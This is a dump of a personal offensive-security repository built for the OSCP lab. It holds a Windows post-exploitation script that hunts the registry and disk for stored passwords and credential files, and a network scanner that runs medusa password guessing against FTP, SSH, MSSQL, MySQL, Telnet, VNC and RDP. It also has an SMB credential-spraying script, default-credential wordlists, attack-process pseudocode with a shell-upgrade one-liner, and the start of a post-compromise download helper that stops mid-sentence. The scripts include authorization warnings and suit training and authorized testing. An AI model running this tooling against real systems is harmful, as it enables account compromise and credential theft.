├── LICENSE ├── README.md ├── localrecon.cmd ├── oscp_process.py ├── quickscan ├── TODOs.txt ├── checkcreds.sh ├── quickscan.sh └── wordlists │ ├── ftp_pairs.txt │ ├── ftp_users.txt │ ├── http_passwords.txt │ ├── http_users.txt │ ├── mssql_passwords.txt │ ├── mssql_users.txt │ ├── mysql_passwords.txt │ ├── mysql_users.txt │ ├── passwords.txt │ ├── users.txt │ └── webdav_pairs.txt └── wget.cmd /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2018, Arris Huijgen 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Random code snippets 2 | 3 | | Snippet | Description | 4 | | ---------------- | ---------------------------------------------------------------------------------------- | 5 | | localrecon.cmd | Script created for OSCP for post-exploitation reconnaissance: a quick overview of a compromised Windows host (users, network, services, patch level, stored credentials), written to a file in %tmp%. | 6 | | wget.cmd | Script created for OSCP to download files to a Windows host via the commandline (plain HTTP, no integrity check: verify what you downloaded before running it). | 7 | | quickscan | Script to identify live hosts in a network and then, for each host, run various tools against its open ports to identify vulnerabilities. Note that it includes online password guessing (medusa) against FTP, SSH, Telnet, MySQL, MSSQL, VNC and RDP, which is noisy and can lock out accounts; only use it against systems you are authorized to test. | 8 | | oscp\_process.py | Pseudocode for attacking the OSCP lab network | 9 | 10 | -------------------------------------------------------------------------------- /localrecon.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | REM 3 | REM This software is provided under the BSD 3-Clause License. 4 | REM See the accompanying LICENSE file for more information. 
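REM
REM Utility to generate a summary of a Windows system
REM
REM Runs a fixed list of built-in commands (no extra tooling needed), grouped
REM in numbered sections, and writes everything to a single output file in
REM %tmp% while echoing progress to the console. Intended for
REM post-exploitation reconnaissance from a low-privileged shell.
REM
REM The output contains credential material (cmdkey, registry and file
REM password searches, VNC/PuTTY/RDP settings): copy it off the host and
REM delete it when done.
REM
REM Author:
REM Arris Huijgen (@bitsadmin)
REM
REM Website:
REM https://github.com/bitsadmin/
REM
REM TODO:
REM * Check drives other than C:\ (if available)
REM * Add commandline parameter to perform a brief check or more extended
REM * Make sure that the output of this script is not again included in the output
REM * The findstr in the Credentials section searches the current directory, not C:\
REM
REM Some more (untested) commands:
REM pushd C:\ ^&^& findstr /I /N /S /P /R flag password secret confidential account payroll credit record * ^&^& popd
REM "dir C:\ /S /O-D /TW ^| findstr /C:"Directory of" /C:"%d%""!;!
REM "dir C:\ /a-r-d /s /b
REM To add: for /F "tokens=2* delims= " %%i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j
REM

setlocal enabledelayedexpansion
REM Output file; %tmp% lives inside the current user's profile
set o="%tmp%\recon%random%.out"
REM Only used by the untested dir/findstr command in the header above
set d=-12-2016
REM Define a separator character (!;!)
REM The variable named ";" holds a line feed, so the separator turns a
REM section's command list into one command per line for the FOR /F loops.
(set ;=^
%=Do not remove this line=%
)
REM Sections: t[N][name] is the heading, t[N] the separator-delimited list.
REM Section 0 lists environment variables; sections 1..%last% are commands.
REM Every index must be unique, otherwise the earlier section is silently
REM overwritten and never executed.
set t[0][name]=Basic 1
set t[0]=COMPUTERNAME!;!USERDNSDOMAIN!;!USERNAME!;!HOMEDRIVE!;!HOMEPATH
set t[1][name]=Basic 2
set t[1]=systeminfo!;!wmic logicaldisk get caption,description,drivetype,providername,volumename ^| more
set t[2][name]=Users
set t[2]=query session!;!net user!;!net localgroup Administrators!;!net user Administrator!;!tree /F "C:\Users"!;!dir /s /b /A:H "C:\Users\"^|find /V "desktop.ini"!;!tree /F "C:\Documents and Settings"!;!dir /s /b /A:H "C:\Documents and Settings\"^|find /V "desktop.ini"
set t[3][name]=Network
set t[3]=ipconfig /all!;!route print!;!arp -a!;!netstat -ano!;!net session ^| find "\\"!;!net view!;!netsh advfirewall show allprofiles!;!netsh firewall show state!;!netsh firewall show config!;!nltest /dclist:
set t[4][name]=Processes, services and tasks
set t[4]=wmic PROCESS get Processid,Caption,Commandline ^| more!;!query process *!;!tasklist /SVC!;!net start!;!DRIVERQUERY /V!;!schtasks /query /fo LIST /v!;!at!;!dir /B C:\WINDOWS\Tasks!;!set ^| find /V "t["
set t[5][name]=Patch-level
set t[5]=wmic qfe get Caption,Description,HotFixID,InstalledOn ^| more
set t[6][name]=Base image configuration files
set t[6]=dir /s /b C:\sysprep.inf C:\sysprep.xml C:\unattend.txt C:\Unattended.xml C:\Services.xml C:\ScheduledTasks.xml C:\Printers.xml C:\Drives.xml C:\DataSources.xml
set t[7][name]=Configuration
set t[7]=reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated!;!reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated!;!reg query HKLM\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits!;!reg query HKLM\System\CurrentControlSet\Services\NfsServer\Parameters\SafeSetUidGidBits!;!gpresult /z
set t[8][name]=Credentials
set t[8]=cmdkey /list!;!dir /s /b /a:-D C:\*pass* C:\*cred* C:\*vnc* C:\*.config* C:\*.kdb*!;!findstr /si password *.xml *.ini *.txt *.ps1 *.cmd!;!reg query HKLM /f password /t REG_SZ /s!;!reg query HKCU /f password /t REG_SZ /s!;!reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V Default*
set t[9][name]=Remote Desktop applications and VPN
set t[9]=dir /b /s C:\*vnc.ini!;!reg query HKCU\SOFTWARE\ORL\WinVNC3\Password!;!dir /s /b C:\*.rdp C:\*.pbk!;!reg query HKCU\Software\SimonTatham\PuTTY\Sessions!;!reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
set t[10][name]=Configuration 2
set t[10]=wmic service get name,displayname,pathname,startmode^|findstr /i "Auto"^|findstr /i /v "C:\Windows\\"^|findstr /i /v """"
set t[11][name]=Files
set t[11]=dir /S /A /B C:\network-secret.txt C:\proof.txt C:\local.txt C:\*.vsd* C:\*flag* C:\*password* C:\*bank* C:\*competit* C:\*finance* C:\*invoice* C:\*risk* C:\*key* C:\*.pcf C:\*.crt C:\*.key C:\*.log ^| find /V /I "%SystemRoot%\winsxs\" ^| find /I /V "%SystemRoot%\Microsoft.NET\"
set t[12][name]=E-mail and documents
set t[12]=dir /S /A /B *.dbx *.wab *.doc *.docx *.xlsx
set t[13][name]=Pre-installed languages
set t[13]=where python!;!where perl!;!where ruby!;!dir /s /b C:\python.exe C:\pythonw.exe C:\perl.exe C:\ruby.exe C:\rubyw.exe C:\bash.exe C:\java.exe C:\javaw.exe C:\php.exe C:\powershell.exe
REM Index of the last section; must equal the highest t[N] defined above
set last=13

:: CMD variables
echo --------------- [0/%last%] %t[0][name]% --------------- >%o% 2>&1
echo --------------- [0/%last%] %t[0][name]% ---------------
FOR /F %%i IN ("!t[0]!") DO (
    echo =^> %%~i
    echo %%i: !%%i! >>%o% 2>&1
)

:: Commands
FOR /L %%n IN (1,1,%last%) DO (
    echo. >>%o% 2>&1
    echo. >>%o% 2>&1
    echo --------------- [%%n/%last%] !t[%%n][name]! --------------- >>%o% 2>&1
    echo.
    echo --------------- [%%n/%last%] !t[%%n][name]! ---------------
    FOR /F "delims=;" %%i IN ("!t[%%n]!") DO (
        set c=%%~i
        echo =^> !c! >>%o% 2>&1
        echo =^> !c!
        REM If command does not contain a pipe, execute directly
        REM Otherwise execute using cmd /c
        IF !c!==!c:^|=! (
            !c! >>%o% 2>&1
        ) ELSE (
            cmd /C "!c! >>%o% 2>&1"
        )
        echo. >>%o% 2>&1
        echo. >>%o% 2>&1
    )
)

REM Results
echo.
echo Done. Results in %o%.
REM Reminder: the file above holds anything the credential searches found;
REM remove it from the host once it has been copied off.

-------------------------------------------------------------------------------- /oscp_process.py: --------------------------------------------------------------------------------
# Title: Pseudocode for attacking the OSCP lab network
# Author: Arris Huijgen (@bitsadmin)
# Website: https://github.com/bitsadmin/

# GENERAL NOTES
# - The OSCP lab was built pre-EternalBlue, therefore many machines are vulnerable to this exploit but you won't learn anything if you exploit machines this way.
# - Make notes! What I used was a Notebook in OneNote with a section for each network segment, and a dedicated page for every host.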
8 | # - I used a page template which contains sections for: 9 | # - IP(s) and hostname 10 | # - Raw notes 11 | # - Open ports (TCP/UDP) 12 | # - Network interfaces 13 | # - Credentials 14 | # - Filesystem (proof.txt/network-secret.txt) 15 | # - Filling in this template forces you to properly perform reconnaissance on every host 16 | # - Use this same structure on your filesystem for files collected from these hosts 17 | # - Have some very old Linux VM (I used CentOS 4.8) to compile exploit source code. Review the source before compiling it: public exploit code is untrusted, so build and test it in this throwaway VM rather than on your attack host. Have an SSH server running on this machine and download the binaries to Kali via SFTP. 18 | # - Spend a lot of time in the labs and #TRYHARDER or temporarily move on to another machine whenever you are stuck 19 | 20 | # TIPS & TRICKS 21 | # - Use the instructions in wget.cmd to download files from the Windows command prompt 22 | # - On Linux after obtaining a (reverse) TCP shell it is often useful to turn it into a TTY shell to for example remain interactive with commands like 'sudo -s' 23 | # - Paste into the TCP shell: python -c 'import pty; pty.spawn("/bin/sh")' (use python3 if python is not available) 24 | # - Whenever an automated (Metasploit/script) exploit fails, inspect the traffic using Wireshark to identify any issues 25 | # - ... 26 | 27 | # PREPARATION 28 | # - Configure your Kali for example using the configure.sh script from https://github.com/bitsadmin/linuxconfig 29 | # - Add additional console aliases for increased productivity, for example the scripts from https://github.com/bitsadmin/linuxconfig -> console 30 | # - Familiarize yourself with the -D, -L and -R parameters of the OpenSSH client for pivoting 31 | # - ... 
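

def main():
    """Top-level loop of the lab attack process (pseudocode).

    For every machine in scope: full TCP port scan, then per-port
    reconnaissance and exploitation attempts. Only when no TCP service got
    us in is the (much slower) UDP scan run and its ports attempted too.
    """
    # Obtain a quick insight into the network using quickscan
    execute_script('https://github.com/bitsadmin/miscellaneous', 'quickscan')

    for machine in lab:
        # Perform full nmap TCP scan (all ports)
        tcp_ports = perform_nmap(tcp)

        exploited = False
        for port in tcp_ports:
            # Perform reconnaissance to obtain:
            # - Software running on the port
            # - Version information of software
            exploited = attempt_exploit(machine, port)
            if exploited:
                # One shell per machine is enough; stop hammering the rest
                break

        if not exploited:
            # Perform full nmap UDP scan; UDP is slow, so do it once per
            # machine and only after every TCP service has been tried
            udp_ports = perform_nmap(udp)
            for port in udp_ports:
                if attempt_exploit(machine, port):
                    break


def attempt_exploit(machine, port):
    """Try to get a shell on ``machine`` via ``port`` and, on success, work it.

    Returns True when a shell was obtained (and recon, escalation and
    collection were run), False otherwise. The caller relies on this value
    to decide whether to keep trying other ports.
    """
    # 1. Search exploit using Kali's searchsploit tool
    # 2. Update payload to for example a reverse Meterpreter shell to your IP
    # 3. Attempt exploit
    # 4. If not working, but should work, revert the VM and try again
    shell = exploit(machine, port)

    if not shell:
        return False

    local_recon()

    # From shell with limited privileges, escalate to a high-privileged user
    escalate()

    # Collect your proof.txt file and dump any other credential material you can now access
    # Add this information to your notes as you might need it later
    collect()
    return True


def local_recon():
    """Run the OS-specific local enumeration script and return its output.

    Returns None when the target is neither Windows nor Linux (for example
    a network device), so the caller can tell that no recon was performed.
    """
    results = None

    if windows:
        # Download localrecon.cmd in limited Windows shell
        # See https://github.com/bitsadmin/miscellaneous -> wget.cmd
        results = execute_script('https://github.com/bitsadmin/miscellaneous', 'localrecon.cmd')
        # Evaluate results looking for any:
        # - Passwords
        # - Non-default software installed -> Identify software version and check if exploitable
        # - Missing patches using https://github.com/bitsadmin/wesng

    elif linux:
        results = execute_script('https://github.com/mzet-/linux-exploit-suggester', 'linux-exploit-suggester.sh')
        # Evaluate results looking for any:
        # - Credential material
        # - Exploits for vulnerable software
        # - Weak file system permissions

    return results

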
| if __name__ == '__main__': 92 | main() 93 | -------------------------------------------------------------------------------- /quickscan/TODOs.txt: -------------------------------------------------------------------------------- 1 | # TODO 2 | # Implement: 3 | # - 554/open/tcp//rtsp?/// 4 | # Maybe implement: 5 | # - 995/open/tcp//ssl|pop3//UW Imap pop3d 2001.78rh/ 6 | # - 135/open/tcp//msrpc//Microsoft Windows RPC/ 7 | # - 5900/open/tcp//vnc//VNC (protocol 3.8)/ 8 | # - 3372/open/tcp//msdtc//Microsoft Distributed Transaction Coordinator/ 9 | # - 53/open/tcp//domain//Microsoft DNS 6.1.7601/ 10 | # - 88/open/tcp//kerberos-sec//Microsoft Windows Kerberos (server time: 2013-12-29 13:52:51Z)/ 11 | # - 389/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: thinc.local, Site: Default-First-Site-Name)/ 12 | # - 3268/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: thinc.local, Site: Default-First-Site-Name)/ 13 | # - 888/open/tcp//http-proxy//Squid http proxy 3.3.8/ 14 | # - Server responded that host is not allowed to connect to MySQL service. 
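# Something goes wrong with:
# - /open/tcp//status//1 (RPC #100024)/
# - l-s//Microsoft SQL Server 2000 8.00.766.00; SP3a/
# - 080/open/tcp//http//Apache httpd 2.4.9 ((Win32) PHP|5.5.12)/
# Skip:
# - 800/open/tcp//vnc-http//TightVNC (user: gamma; VNC TCP port: 5900)/

Oracle-TNS
# TODO, check: http://tools.kali.org/vulnerability-analysis/dbpwaudit
-------------------------------------------------------------------------------- /quickscan/checkcreds.sh: --------------------------------------------------------------------------------
#!/bin/bash
#
# Check whether one username/password pair is accepted by SMB on every host
# in scope that exposes 445/TCP.
#
# Usage: checkcreds.sh <username> <password> [scope]
#   scope defaults to 10.11.1.0/24 (the lab range quickscan.sh uses)
#
# Notes:
# - This is online password testing: a single attempt per host, but it is
#   logged by the target and counts towards lockout policies. Only run it
#   against systems you are authorized to test.
# - The password is handed to smbclient through the PASSWD environment
#   variable instead of "-U user%pass", so it does not show up in the
#   process list of the attacking machine.
# - Only port 445 is scanned here, so creds.gnmap is authoritative for which
#   hosts to try; the per-host quickscan output is not needed.

if [[ $# -lt 2 ]]
then
    echo "Usage: $0 <username> <password> [scope]" >&2
    exit 1
fi

username=$1
password=$2
scope=${3:-10.11.1.0/24}

nmap -sT -T4 -p445 "$scope" -oA creds

# Hosts with 445 open; the gnmap "Ports:" line looks like
#   Host: <ip> (<name>)  Ports: 445/open/tcp//microsoft-ds///
ips=$(grep '445/open' creds.gnmap|cut -d' ' -f2)

for ip in $ips
do
    # SMB (445): list shares with the supplied credentials; a zero exit
    # status means the logon was accepted
    if PASSWD="$password" smbclient -L "//$ip/" -U "$username"
    then
        echo "[+] Found credentials to work on SMB of host $ip"
    else
        echo "[-] Credentials rejected (or SMB unreachable) on host $ip"
    fi
done
-------------------------------------------------------------------------------- /quickscan/quickscan.sh: --------------------------------------------------------------------------------
#!/bin/bash
#
# This software is provided under the BSD 3-Clause License.
# See the accompanying LICENSE file for more information.
#
# Script to obtain a quick insight into an unknown network
# storing the results in a structured way.
#
# Author:
# Arris Huijgen (@bitsadmin)
#
# Website:
# https://github.com/bitsadmin/
#

# Instructions
# 1.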
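# Place the wordlists in the /root/hosts/_credentials folder:
#    - Generic list of users in users.txt (e.g. admin, administrator, user)
#    - Generic list of passwords in passwords.txt (e.g. admin, password, 1234)
#    - Service-specific list of users in [service]_users.txt (e.g. for MySQL stored in mysql_users.txt: root, mysql)
#    - Service-specific list of passwords in [service]_passwords.txt (e.g. mysql_passwords.txt)
#      [service] is the name passed to get-wordlist below: ftp, ssh, mssql, mysql, telnet, vnc or rdp.
#      The wordlists/ folder in this repository contains starter lists.
# 2. Define the scope to be scanned below
# 3. Run the script from /root/hosts (output paths are relative to the current
#    directory) and wait for the results to appear in the /root/hosts/* folder
#    structure: one folder per host, named after the last octet of its IP address
#
# WARNING: besides passive enumeration this script performs online password
# guessing with medusa (10 parallel threads) against FTP, SSH, MSSQL, MySQL,
# Telnet, VNC and RDP, and runs nikto/wfuzz against every web server found.
# That is noisy, can lock out accounts and can crash fragile services. Only
# run it against systems you are explicitly authorized to test, and remove
# the medusa lines if password guessing is out of scope.

# Scope
cat > hosts.txt << END
10.11.1.0/24
10.11.2.5
END

# Temporary directory for the merged wordlists built by get-wordlist; removed
# on exit so no copies of the credential lists linger in /tmp
tmpdir=$(mktemp -d)
trap 'rm -rf "$tmpdir"' EXIT

# Extract last octet from IP address, zero-padded to three digits (used as
# the per-host output folder name so folders sort numerically)
function get-lastoctet {
    printf "%03d" $(echo "$1"|cut -d'.' -f 4)
}

# Compile output filename: ./<last octet>/<name>.<ext>
#   $1 ip, $2 base name, $3 optional extension (default txt; "null" for no
#   extension, which is what nmap -oA and eyewitness -d need as they add their own)
function get-outfile {
    local ext=.txt
    if [ -n "$3" ]
    then
        if [ "$3" = "null" ]
        then
            ext=
        else
            ext=.$3
        fi
    fi
    printf "./%s/%s%s" $(get-lastoctet "$1") "$2" "$ext"
}

# Fetch path to tool-specific wordlist
#   $1 wordlist type (users/passwords), $2 optional service name
# Prints the generic list or, when <service>_<type>.txt exists, a merged and
# de-duplicated copy of both, written once per run into $tmpdir.
function get-wordlist {
    local wltype=$1
    local tool=$2
    basedir="/root/hosts/_credentials"
    basefile="${basedir}/${wltype}.txt"
    toolfile="${basedir}/${tool}_${wltype}.txt"
    if [ ! -f "$basefile" ]
    then
        # The caller still receives the path; the tool will report the error
        echo "[!] Wordlist not found: $basefile" >&2
    fi
    if [ -f "$toolfile" ]
    then
        outfile="${tmpdir}/${tool}_${wltype}.txt"
        cat "$toolfile" "$basefile"|sort -u>"$outfile"
        echo "$outfile"
        return
    fi
    echo "$basefile"
}

# Extract the port entries from an nmap greppable (.gnmap) file, one
# "port/state/proto//service///" entry per line
#   $1 gnmap file, $2 optional grep filter on the entry (default "/open/";
#   the UDP scan passes "/open" so that open|filtered ports are kept as well)
function get-openports {
    local filter=${2:-/open/}
    sed -n -e 's/.*Ports: //;s_\([0-9]\{1,5\}/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/\),\?\s_\1\n_;t matched;d;:matched;P;D' "$1"|grep "$filter"
}

# ARP scan for quick insight
#start=$SECONDS
#arp-scan -I tap0 $iprange > arp-scan.txt
#echo "ARP scan took: $(($SECONDS-$start)) seconds"

# Perform Nmap Initial scan (top 100 ports, no DNS resolution) to find live hosts
start=$SECONDS
echo "Running initial Nmap scan"
nmap -F -n -T4 -iL hosts.txt -oA quick
echo "NMap Initial scan took: $(($SECONDS-$start)) seconds"
ips=$(grep 'Status: Up' quick.gnmap|cut -d' ' -f2)

# Create folders for output (-p: re-running the script must not fail here)
for ip in $ips
do
    mkdir -p $(get-lastoctet $ip)
done

# Make screenshots of all found supported protocols found
eyewitness -x $(pwd)/quick.xml --threads 5 --timeout 3 --all-protocols -d $(pwd)/eyewitness

# Run various tools against found TCP ports
for ip in $ips
do
    start=$SECONDS
    echo "Running Nmap TCP scan against ${ip}"
    # 15 minute cap per host; hosts that hit it are listed in timedout_tcp and skipped
    timeout --signal=INT 900 nmap -T4 -sV -sC -p- $ip -oA $(get-outfile $ip nmap_tcp null)
    rc=$?
    if [[ $rc != 0 ]]
    then
        echo $ip >> timedout_tcp
        continue
    fi
    echo "NMap TCP scan took: $(($SECONDS-$start)) seconds"

    # HOST TIMER
    hstart=$SECONDS

    openports=$(get-openports $(get-outfile $ip nmap_tcp gnmap))
    while read -r port
    do
        # PORT TIMER
        pstart=$SECONDS
        portname="$(echo "$port"|cut -d"/" -f5)"
        portid="$(echo "$port"|cut -d"/" -f1)"

        # Skip tcpwrapped ports and hosts without any open TCP ports
        if [[ $portname == "tcpwrapped" || $portname == "" ]]
        then
            continue
        fi

        echo "Checking ${portid}/TCP (${portname})"

        # HTTP (80)
        if [[ $portname == "http" || $portname == "http?" ]]
        then
            nikto -nossl -host $ip -port $portid -output $(get-outfile $ip nikto_${portid}_http)
            wfuzz -c -z file,wordlist/general/big.txt --hc 404 -R 0 http://$ip:$portid/FUZZ > $(get-outfile $ip wfuzz_${portid}_http)
            eyewitness --web -d $(get-outfile $ip eye-http null) --no-prompt --add-http-ports $portid --single $ip:$portid

        # HTTPS (443)
        elif [[ $portname == "https" || $portname == "https?" || $portname == "ssl|http" ]]
        then
            nikto -ssl -host $ip -port $portid -output $(get-outfile $ip nikto_${portid}_https)
            wfuzz -c -z file,wordlist/general/big.txt --hc 404 -R 0 https://$ip:$portid/FUZZ > $(get-outfile $ip wfuzz_${portid}_https)
            eyewitness --web -d $(get-outfile $ip eye-https null) --no-prompt --add-https-ports $portid --single $ip:$portid

        # FTP (21) - online password guessing, see the warning in the header
        elif [[ $portname == "ftp" || $portname == "ftp?" ]]
        then
            medusa -h $ip -U $(get-wordlist users ftp) -P $(get-wordlist passwords ftp) -O $(get-outfile $ip medusa-ftp) -e ns -M ftp -n $portid -t 10

        # SSH (22) - online password guessing
        elif [[ $portname == "ssh" ]]
        then
            medusa -h $ip -U $(get-wordlist users ssh) -P $(get-wordlist passwords ssh) -O $(get-outfile $ip medusa-ssh) -e ns -M ssh -n $portid -t 10

        # MSSQL (1433) - online password guessing
        elif [[ $portname == "ms-sql" || $portname == "ms-sql-s" ]]
        then
            medusa -h $ip -U $(get-wordlist users mssql) -P $(get-wordlist passwords mssql) -O $(get-outfile $ip medusa-mssql) -e ns -M mssql -n $portid -t 10

        # MySQL (3306) - online password guessing
        elif [[ $portname == "mysql" || $portname == "mysql?" ]]
        then
            nmap -sT -p3306 --script mysql-brute $ip -oA $(get-outfile $ip nmap_mysql null)
            medusa -h $ip -U $(get-wordlist users mysql) -P $(get-wordlist passwords mysql) -O $(get-outfile $ip medusa-mysql) -e ns -M mysql -n $portid -t 10

        # NetBIOS (139)
        elif [[ $portname == "netbios-ssn" ]]
        then
            enum4linux -a $ip >$(get-outfile $ip enum4linux)
            timeout --signal=INT 900 nmap -T4 -sU -sT -p U:137,T:139 --script "vuln" $ip -oN $(get-outfile $ip nmap_netbios nmap)

        # Microsoft-ds (445)
        elif [[ $portname == "microsoft-ds" ]]
        then
            enum4linux -a $ip >$(get-outfile $ip enum4linux)
            timeout --signal=INT 900 nmap -T4 -sT -p139,445 --script "smb-vuln-*" $ip -oN $(get-outfile $ip nmap_smbvuln nmap)

        # Telnet (23) - online password guessing
        elif [[ $portname == "telnet" || $portname == "telnet?" ]]
        then
            medusa -h $ip -U $(get-wordlist users telnet) -P $(get-wordlist passwords telnet) -O $(get-outfile $ip medusa-telnet) -e ns -M telnet -n $portid -t 10

        # Oracle TNS listener
        elif [[ $portname == "oracle-tns" ]]
        then
            oscanner -s $ip -P $portid > $(get-outfile $ip oracle-tns)

        # VNC (5900) - online password guessing
        elif [[ $portname == "vnc" ]]
        then
            #eyewitness --vnc -d $(get-outfile $ip eye-vnc null) --no-prompt --single $ip
            medusa -h $ip -U $(get-wordlist users vnc) -P $(get-wordlist passwords vnc) -O $(get-outfile $ip medusa-vnc) -e ns -M vnc -n $portid -t 10

        # SMTP (25)
        elif [[ $portname == "smtp" ]]
        then
            smtp-user-enum -U $(get-wordlist users) -t $ip -p $portid > $(get-outfile $ip smtp-users)
            smtp-user-enum -U $(get-wordlist users_extensive) -t $ip -p $portid > $(get-outfile $ip smtp-users_extensive)
            smtp-user-enum -U $(get-wordlist names) -t $ip -p $portid > $(get-outfile $ip smtp-names)

        # RDP (3389) - online password guessing
        elif [[ $portname == "ms-wbt-server" ]]
        then
            medusa -h $ip -U $(get-wordlist users rdp) -P $(get-wordlist passwords rdp) -O $(get-outfile $ip medusa-rdp) -e ns -M rdp -n $portid -t 10

        # RPCBIND (111)
        elif [[ $portname == "rpcbind" ]]
        then
            rpcinfo -p $ip > $(get-outfile $ip rpcinfo) 2>&1
            showmount -e $ip > $(get-outfile $ip showmount) 2>&1
        fi

        # TIMER
        echo "Port took: $(($SECONDS-$pstart)) seconds"
    done <<< "$openports"

    # TIMER
    echo "Host took: $(($SECONDS-$hstart)) seconds"
done

# More advanced checks
for ip in $ips
do
    openports=$(get-openports $(get-outfile $ip nmap_tcp gnmap))

    while read -r port
    do
        # PORT TIMER
        pstart=$SECONDS
        portname="$(echo "$port"|cut -d"/" -f5)"
        portid="$(echo "$port"|cut -d"/" -f1)"

        # HTTP
        if [[ $portname == "http" || $portname == "http?" ]]
        then
            wfuzz -c -z file,wordlist/general/big.txt --hc 404 -R 0 http://$ip:$portid/FUZZ.html > $(get-outfile $ip wfuzz_${portid}_http-html)
            eyewitness --web -d $(get-outfile $ip eye-http null) --no-prompt --add-http-ports $portid --single $ip:$portid

        # HTTPS
        elif [[ $portname == "https" || $portname == "https?" || $portname == "ssl|http" ]]
        then
            wfuzz -c -z file,wordlist/general/big.txt --hc 404 -R 0 https://$ip:$portid/FUZZ.html > $(get-outfile $ip wfuzz_${portid}_https-html)
            eyewitness --web -d $(get-outfile $ip eye-https null) --no-prompt --add-https-ports $portid --single $ip:$portid
        fi
    done <<< "$openports"
done

# Perform Nmap top 1000 UDP scan
start=$SECONDS
for ip in $ips
do
    echo "Running Nmap UDP scan against ${ip}"
    timeout --signal=INT 900 nmap -T4 -sU -sV -sC --top-ports 1000 $ip -oA $(get-outfile $ip nmap_udp null)
    rc=$?
    if [[ $rc != 0 ]]
    then
        echo $ip >> timedout_udp
        continue
    fi

    # Run various tools against found UDP ports ("/open" also keeps
    # open|filtered, which is what most UDP services are reported as)
    openports=$(get-openports $(get-outfile $ip nmap_udp gnmap) /open)
    while read -r port
    do
        portname="$(echo "$port"|cut -d"/" -f5)"
        portid="$(echo "$port"|cut -d"/" -f1)"

        # Skip hosts without any open UDP ports
        if [[ $portname == "" ]]
        then
            continue
        fi

        echo "Checking ${portid}/UDP (${portname})"

        # SNMP (161)
        if [[ $portname == "snmp" || $portname == "snmp?" ]]
        then
            snmp-check -v 2c $ip>$(get-outfile $ip snmpcheck)

        # DNS (53)
        elif [[ $portname == "domain" ]]
        then
            timeout --signal=INT 300 nmap -T4 -sU -sT -p53 --script "dns-nsid,dns-recursion" $ip -oN $(get-outfile $ip nmap_dns nmap)

        # Netbios-ns (137)
        elif [[ $portname == "netbios-ns" ]]
        then
            nbtscan -v $ip >$(get-outfile $ip nbtscan txt)
        fi
    done <<< "$openports"
done
echo "NMap UDP scan took: $(($SECONDS-$start)) seconds"
-------------------------------------------------------------------------------- /quickscan/wordlists/ftp_pairs.txt: --------------------------------------------------------------------------------
newuser wampp
anonymous some@mail.net

-------------------------------------------------------------------------------- /quickscan/wordlists/ftp_users.txt: --------------------------------------------------------------------------------
anonymous
root
user
ftpuser
newuser

-------------------------------------------------------------------------------- /quickscan/wordlists/http_passwords.txt: --------------------------------------------------------------------------------
xampp
-------------------------------------------------------------------------------- /quickscan/wordlists/http_users.txt: --------------------------------------------------------------------------------
wampp
-------------------------------------------------------------------------------- /quickscan/wordlists/mssql_passwords.txt: --------------------------------------------------------------------------------
password

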
-------------------------------------------------------------------------------- /quickscan/wordlists/mssql_users.txt: -------------------------------------------------------------------------------- 1 | sa 2 | admin 3 | administrator 4 | -------------------------------------------------------------------------------- /quickscan/wordlists/mysql_passwords.txt: -------------------------------------------------------------------------------- 1 | password 2 | usbw 3 | -------------------------------------------------------------------------------- /quickscan/wordlists/mysql_users.txt: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | -------------------------------------------------------------------------------- /quickscan/wordlists/passwords.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | 1234 4 | 5 | -------------------------------------------------------------------------------- /quickscan/wordlists/users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | administrator 3 | Administrator 4 | -------------------------------------------------------------------------------- /quickscan/wordlists/webdav_pairs.txt: -------------------------------------------------------------------------------- 1 | wampp xampp -------------------------------------------------------------------------------- /wget.cmd: -------------------------------------------------------------------------------- 1 | :: This software is provided under the BSD 3-Clause License. 2 | :: See the accompanying LICENSE file for more information. 
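::
:: Oneliner to download files on Windows via the commandline
:: Use this after somehow obtaining a shell on a Windows machine
::
:: The generated wget.vbs fetches a URL with a WinHttp/MSXML object and
:: writes the response body to a file. It exits non-zero (and prints why)
:: when no HTTP object could be created, when the request fails, when the
:: server answers with anything other than 200, or when the file cannot be
:: written; without those checks "On Error Resume Next" would silently
:: leave an empty or partial file behind.
::
:: The transfer is plain HTTP with no integrity check: verify the downloaded
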